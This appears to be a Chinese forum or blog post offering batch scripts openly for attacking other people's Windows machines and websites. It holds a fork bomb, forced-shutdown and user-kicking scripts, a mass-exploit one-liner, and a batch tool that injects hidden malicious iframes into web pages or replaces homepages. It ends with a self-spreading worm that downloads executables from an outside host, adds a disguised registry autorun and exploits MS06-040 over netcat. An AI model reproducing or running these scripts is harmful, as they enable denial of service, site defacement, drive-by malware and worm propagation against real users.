批處理 - JavaShuo

第一個:讓別人內存OVER(逼他重啓)
@echo off
start cmd
%0
就這3行了

第二個:讓對方重啓指定次數(害人專用)
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
if not exist c:\2.txt echo. >c:\2.txt & goto err1
if not exist c:\3.txt echo. >c:\3.txt & goto err1
if not exist c:\4.txt echo. >c:\4.txt & goto err1
if not exist c:\5.txt echo. >c:\5.txt & goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上面可讓對方電腦重啓5次後不在重啓

第三個:自動踢人(3389肉機保護本身專用)
@echo off
logoff 1
del log.bat
logoff後面的1改爲本身登錄的ID號,用query user查看

第四個: 批量自動溢出
@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521
先本身用NC監聽端口,多開幾個,而後指行,就自動溢出了

第五個:自動掛馬改主頁
@echo off
cls
rem 直接打批處理名字就有幫助
title 批量掛馬,改首頁
color A
set pan=%1
set ye=%2
set dai=%3
if "%pan%"=="" goto e1
if "%ye%"=="" goto e1
if "%dai%"=="" goto e1
if "%dai%"=="htm.txt" goto u1
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^<iframe src="http://%dai%" width="0" height="0" frameborder="0"^> >>@path"
echo.
echo 代碼所有插入完畢!!!!
echo.
pause
goto e1
:u1
echo 您如今的操做將使%pan%盤下,所有名爲%ye%的內容變爲您要更改的內容.
echo 這將是很是危險的,您真的要這樣作? 回車卻認,Ctrl+c取消操做.
pause
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y"
echo.
echo 首頁所有更改完必!!!!若是您發現沒有替換成功,請將%ye% 文件只讀屬性去掉.
echo.
pause
:e1
echo.
echo 本批處理只適用於2003 系統,其餘系統要使用,請將forfiles.exe拷貝至系統盤system32目錄下
echo 用法:snj ^<搜索盤符^> ^<文件名^> ^<網馬地址^>
echo 例子:snj d:\ index.asp www.muma.com/mm.htm
echo 批處理將自動添加^<iframe^>標記
echo.
echo 若是您要更改所有網站的首頁!請在批處理文件所在目錄下,新建一個名爲htm.txt的文本文件.
echo 而後將要更改的代碼加COPY到裏面保存.而後將命令的^<網馬地址^>項輸入爲htm.txt便可.
echo 例子:snj d:\ index.asp htm.txt
echo.
echo 爲了能準確無誤執行批處理請最好先把記事本的"自動換行功能去掉",讓命令保持在一行才能正確執行.
echo.
echo 使用此批處理形成一切後果本人概不負責,請你們謹慎使用!
echo.

第六個:利用批處理編寫利用系統漏洞傳播的蠕蟲病毒
del c:\42.exe
del c:\nc.exe
del c:\ip.exe
echo dim wsh > %systemroot%\help\test.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs
echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs
echo dim wsh > %systemroot%\help\test2.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test2.vbs
echo wsh.run "cmd /c start %systemroot%\help\good.bat",0 >> %systemroot%\help\test2.vbs
echo open 10.0.0.5 > %systemroot%\help\ftp.txt
echo open myyes >> %systemroot%\help\ftp.txt
echo 1 >> %systemroot%\help\ftp.txt
echo binary >> %systemroot%\help\ftp.txt
echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt
echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt
echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt
echo bye >> %systemroot%\help\ftp.txt
echo echo Set xPost = CreateObject("Microsoft.XMLHTTP") ^>1.vbs > %systemroot%\help\or.txt
echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo...,0 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo Set sGet = CreateObject("ADODB.Stream") ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Write(xPost.responseBody) ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.SaveToFile "d:\my.exe",2 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo 1.vbs ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo my.exe ^>^>1.vbs >> %systemroot%\help\or.txt
echo Windows Registry Editor Version 5.00 > %systemroot%\help\1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %systemroot%\help\1.reg
echo "SKYNET Personal FireWall"="F:\\系統安全工具[url=file://\\FireWall\\PFW.exe]\\FireWall\\PFW.exe[/url]" >> %systemroot%\help\1.reg
echo "1"="%systemroot%\\help\\test2.vbs" >> %systemroot%\help\1.reg
if not exist %systemroot%\help\good.bat copy good.bat %systemroot%\help\good.bat & %systemroot%\help\test2.vbs & del good.bat
regedit -s %systemroot%\help\1.reg
ftp -s:%systemroot%\help\ftp.txt
move c:\nc.exe %systemroot%\help\ /y
move c:\42.exe %systemroot%\help\ /y
move c:\ip.exe %systemroot%\help\ /y
%systemroot%\help\test.vbs
rem for /f %%i in (result1.txt) do set a=%%i
rem for /f %%j in (result.txt) do 42 %a% %%j 810
準備:
1:找一個反向鏈接的溢出 *** 程序,如ms06040漏洞
2:找呀一個免費FTP 空間,最好是送域名的
3:利用你所知道的高級語言編寫一個,能生成隨機範圍IP地址和找到本機IP的工具.
思路:
用for語句對指定文本里的IP進行溢出,而後用if語句判斷是否溢出成功, 若是成功開啓一個NC監聽端口,NC後面帶一個 < 輸入符號
輸入的內容爲下載本批處理文件,而後執行這個批處理.這樣被溢出的機器就又會在他那裏運行我門的批處理,從而到自動傳播的目的. 把批處理生成的文件集中放到一個目錄下,能夠%systemroot%系統變量直接放到系統目錄下由於批處理運行後會閃出命令行窗口,我門能夠利用VBS腳原本運行咱們的批處理,這樣就不會有任何窗口出現,腳本以下 echo dim wsh > %systemroot%\help\test.vbs echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs 生成隨機IP工具的VB代碼 Private Sub Form_Load() Dim fso As New FileSystemObject Dim a, b, c, d As Integer Dim ph, e As String ph = App.Path & "\" & "ip.txt" Randomize a = Int(253 * Rnd + 1) b = Int(253 * Rnd + 1) c = Int(240 * Rnd + 1) Open ph For Output As #1 For i = c To c + 7 For j = 1 To 254 e = a & "." & b & "." & i & "." & j Print #1, e DoEvents Next j Next i Close #1 Unload Me End Sub